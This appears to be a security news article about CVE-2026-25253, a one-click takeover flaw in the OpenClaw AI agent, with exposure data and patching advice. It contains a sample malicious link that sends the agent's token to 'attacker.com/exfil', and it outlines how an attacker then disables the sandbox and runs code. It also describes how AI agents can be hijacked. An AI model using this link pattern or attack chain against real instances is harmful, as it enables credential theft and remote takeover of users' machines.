One Click, Full Compromise: Critical OpenClaw Flaw Exposes 135,000 AI Agents to Remote Takeover

CVE-2026-25253 lets attackers hijack OpenClaw AI agents with a single malicious link. Over 135,000 instances are exposed online, many still unpatched.

A critical vulnerability in OpenClaw, the viral open-source AI agent with 145,000 GitHub stars, allows attackers to take full control of a user’s system with a single malicious link. Over 135,000 instances are exposed to the internet. Proof-of-concept exploits are already public.

CVE-2026-25253 carries a CVSS score of 8.8 (High). It requires no authentication. The patch has been available since January 30, but scan data shows thousands of instances remain unpatched. Belgium’s Centre for Cybersecurity issued a national advisory urging immediate patching.

What OpenClaw Does - And Why That Matters

OpenClaw (formerly Clawdbot, then Moltbot) is an autonomous AI personal assistant that runs locally on user devices. It connects large language models to your local files, messaging apps (WhatsApp, Telegram, Slack, Discord, Signal, iMessage), browser sessions, and over 100 preconfigured “AgentSkills” that can execute shell commands, manage filesystems, and automate web interactions.

That’s a lot of power. When the tool works as intended, it automates digital tasks across your entire stack. When an attacker controls it, they get the same access. Every credential, every file, every messaging platform the agent is connected to.

The project exploded from 9,000 to over 60,000 GitHub stars in just days. Companies across Silicon Valley and China adopted it. That growth outpaced any serious security review.

How the Attack Works

The vulnerability is a logic flaw in how OpenClaw handles URL parameters. OpenClaw’s Control UI accepts a gatewayUrl query parameter and automatically initiates a WebSocket connection to that URL - without asking the user.

The attack chain works in six steps:

  1. Delivery. Attacker sends a link: ?gatewayUrl=wss://attacker.com/exfil
  2. Connection. Victim’s browser automatically opens a WebSocket to the attacker’s server
  3. Exfiltration. OpenClaw’s authentication token transmits during the WebSocket handshake - no user interaction needed
  4. Access. Attacker uses the stolen token to connect to the victim’s local OpenClaw gateway
  5. Reconfiguration. Attacker disables sandbox policies and enables dangerous tools
  6. Execution. Privileged API calls achieve remote code execution on the host

The critical detail: OpenClaw’s server doesn’t validate the WebSocket origin header. It accepts connections from any website. This means the victim’s own browser acts as a bridge, bypassing firewalls and NAT restrictions to reach services bound to localhost. Even if you never exposed OpenClaw to the internet, you’re still vulnerable if you click the wrong link while it’s running.

Security researcher depthfirst discovered and reported the vulnerability, with proof-of-concept code published after the disclosure on January 26, 2026.

135,000 Instances, Wide Open

The exposure numbers paint a grim picture. Bitdefender found over 135,000 internet-facing OpenClaw instances, many originating from corporate IP space rather than hobby deployments. Separately, Security Boulevard identified 42,900 exposed control panels. Tens of thousands are linked to previously breached infrastructure or known malicious IP addresses.

This exposure isn’t accidental. OpenClaw binds by default to 0.0.0.0:18789 - listening on all interfaces unless an operator explicitly restricts it. A secure-by-default design would bind to 127.0.0.1. OpenClaw doesn’t.

So you have an autonomous AI agent with shell access, file access, and messaging platform credentials, bound to all network interfaces, with a one-click remote takeover vulnerability. That’s not a bug report - that’s a breach waiting to happen.

The AI Agent Security Problem

This follows a pattern. Two days ago, we covered three GitHub Copilot command injection flaws affecting every major IDE. Last week, DockerDash showed how Docker’s AI assistant could be hijacked through metadata injection. The Bondu AI toy exposed 50,000 children’s conversations through a misconfigured console.

The common thread: AI tools are being shipped with broad system access and inadequate security boundaries. These aren’t novel attack techniques. Missing origin validation on WebSockets, unsanitized URL parameters, default-open network bindings - these are basic security failures that have been well-documented for over a decade. The difference is that the blast radius of each failure is now vastly larger because the compromised tool has autonomous access to everything on the machine.

OpenClaw connects to your shell, your files, your messaging apps, and your cloud credentials. Copilot runs in your IDE with access to your codebase and development environment. Docker’s AI assistant manages your container infrastructure. When these tools are compromised, attackers don’t just get a foothold - they get the keys to the entire operation.

What You Should Do

If you run OpenClaw, patch now. Update to version 2026.1.29 or later. The fix adds a gateway URL confirmation modal that requires explicit user approval before connecting to new gateway URLs.

Rotate everything. After updating, generate a new authToken for all OpenClaw instances. Then rotate API keys for every connected service - Slack, Discord, Telegram, AWS, GCP, Azure, and anything else your agent touches. If you were compromised before patching, the attacker already has those credentials.

Audit your logs. Look for unexpected WebSocket connections to external domains and sudden gateway configuration changes since January 26, 2026 - when the proof-of-concept was first disclosed.

Lock down the network binding. Change OpenClaw’s binding from 0.0.0.0 to 127.0.0.1. If you need remote access, put it behind a VPN or authenticated reverse proxy. There’s no reason an autonomous AI agent should be listening on a public interface.

Question your AI agent architecture. If an AI tool has shell access, file access, and network access, treat it like a privileged service. Apply the same security controls you’d apply to a database server or CI/CD runner: network isolation, minimal permissions, monitored access, and regular security audits. The convenience of an all-access AI assistant isn’t worth the exposure when a single click can hand everything over.